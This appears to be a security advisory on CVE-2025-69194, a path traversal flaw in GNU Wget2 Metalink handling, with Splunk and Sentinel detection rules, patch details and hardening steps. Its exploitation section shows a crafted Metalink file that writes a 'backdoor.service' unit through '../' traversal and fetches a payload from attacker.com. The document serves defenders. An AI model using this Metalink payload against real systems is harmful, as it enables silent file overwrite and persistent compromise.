Executive Summary
CVE-2025-69194 is a high-severity path traversal vulnerability in GNU Wget2 affecting Metalink (v3/v4) processing. The flaw allows a remote attacker to overwrite or create arbitrary files on the target system by abusing unsanitized file paths embedded inside Metalink XML metadata.
The vulnerability is particularly dangerous in automated environments (CI/CD, cron jobs, system provisioning scripts), where wget2 often runs unattended and may execute with elevated privileges.
Vulnerability Classification
| Category | Value |
|---|---|
| CVE ID | CVE-2025-69194 |
| CVSS Score | 8.8 |
| Severity | High |
| Attack Vector | Network |
| Attack Complexity | Low |
| Privileges Required | None |
| User Interaction | Required (or automated job) |
| Exploit Maturity | Functional |
| Impact Type | Arbitrary File Overwrite |
| Root Cause | Improper Path Validation |
Root Cause Analysis
Component Affected
- Metalink parser in GNU Wget2
- Affects both
.metalinkand.meta4formats
What Failed Internally
- The Metalink XML attribute
<file name="...">was used directly as the local output filename. - No normalization or canonicalization was enforced.
- No validation against:
- Relative traversal (
../) - Absolute paths (
/etc/passwd) - Encoded traversal (
%2e%2e/)
- Relative traversal (
- No restriction to a sandboxed download directory.
Resulting Behavior
When parsing the Metalink:
- The resolved path is passed to filesystem write functions.
- The OS honors the path exactly as provided.
- Any file writable by the
wget2process can be:- Created
- Overwritten
- Truncated
Exploitation Flow
Step 1 – Attacker crafts Metalink XML
<metalink>
<file name="../../.config/systemd/user/backdoor.service">
<url location="us">http://attacker.com/payload</url>
</file>
</metalink>
Step 2 – Victim executes wget2
wget2 --metalink malicious.meta4
Step 3 – Path traversal occurs
- Download directory is bypassed
- File is written to:
~/.config/systemd/user/backdoor.service
Step 4 – Persistence / Impact
- File may later be executed
- System behavior altered
- Silent compromise possible
Realistic Impact Scenarios
User-Level Impact
- Shell startup file injection (
.bashrc,.profile) - SSH config manipulation
- Credential theft via altered configs
System-Level Impact (if elevated)
- Cron job injection
- Service override
- Denial of service
- Backdoor persistence
MITRE Mapping
CWE
- CWE-22 – Path Traversal
ATT&CK (Defensive Mapping)
| Technique | Description |
|---|---|
| T1204 | User-assisted execution |
| T1105 | Ingress tool transfer |
| T1546 | Event-triggered execution |
| T1499 | Service disruption |
Detection & Threat Hunting
What Makes This CVE Detectable
- Wget2 normally writes to predictable locations
- Metalink usage is uncommon in daily operations
- Writes to protected paths are high-signal events
Log Sources Required
| Platform | Log Source |
|---|---|
| Linux | auditd |
| EDR | Process + File telemetry |
| Network | Proxy / IDS |
| SIEM | File integrity monitoring |
| CI/CD | Job execution logs |
SPLUNK DETECTION RULES
1. Detect Wget2 Writing Outside Download Directories
index=os_logs
(process_name="wget2" OR process="wget2")
(syscall=creat OR syscall=open OR syscall=openat)
| where NOT like(file_path, "%/Downloads/%")
AND NOT like(file_path, "%/tmp/%")
AND NOT like(file_path, "%/var/tmp/%")
| stats count by host, user, file_path, process_name
Alert When:
wget2writes to/etc,.config,/usr/local/bin, or shell startup files
2. Detect Metalink Downloads
index=proxy_logs
http_response_content_type="application/metalink+xml"
OR uri_path IN ("*.meta4","*.metalink")
| stats count by src_ip, uri, user_agent
Enrichment: correlate with endpoint events within ±5 minutes.
3. Detect Encoded Path Traversal in Metalink Payloads
index=proxy_logs
| regex http_response_body="file\s+name=.*(\.\./|%2e%2e%2f|/etc/|/usr/)"
| stats count by src_ip, uri
MICROSOFT SENTINEL (KQL) DETECTION
1. Wget2 Writing to Sensitive Paths
DeviceFileEvents
| where InitiatingProcessFileName == "wget2"
| where FolderPath has_any ("/etc/", "/usr/local/bin/", "/.config/", "/cron")
| project TimeGenerated, DeviceName, InitiatingProcessAccountName,
FolderPath, FileName, InitiatingProcessCommandLine
2. Metalink Network Activity
DeviceNetworkEvents
| where InitiatingProcessFileName == "wget2"
| where RemoteUrl endswith ".meta4" or RemoteUrl endswith ".metalink"
| project TimeGenerated, DeviceName, RemoteUrl, RemoteIP
3. Correlation Rule (High Confidence)
let metalinkDownloads =
DeviceNetworkEvents
| where InitiatingProcessFileName == "wget2"
| where RemoteUrl endswith ".meta4";
DeviceFileEvents
| where InitiatingProcessFileName == "wget2"
| where FolderPath has_any ("/etc/", "/.config/")
| join metalinkDownloads on DeviceName
Severity Justification
- Low complexity
- Easily weaponized
- Silent exploitation possible
- High impact in automated environments
- Minimal forensic footprint if not monitored
Official Patch Information
Fixed Version
- GNU Wget2 2.2.1
Patch Behavior
- Normalizes file paths
- Rejects traversal sequences
- Forces output paths to remain within allowed directories
- Blocks absolute paths entirely
Hardening & Mitigation
Immediate
- Upgrade to fixed version
- Disable Metalink if not required
Defensive Controls
- Run wget2 as unprivileged user
- Enforce file integrity monitoring
- Restrict outbound access for automation jobs
- Add SIEM alerts from rules above
Post-Incident Checklist
- Verify overwritten files
- Check cron, systemd user services
- Review
.bashrc,.profile - Rotate credentials if tampering suspected
- Rebuild system if persistence detected
Final Assessment
CVE-2025-69194 is not theoretical.
It is a clean, reliable file overwrite primitive that becomes critical when paired with automation or poor privilege separation.
Treat Metalink-based downloads as untrusted input. Patch immediately and monitor continuously.
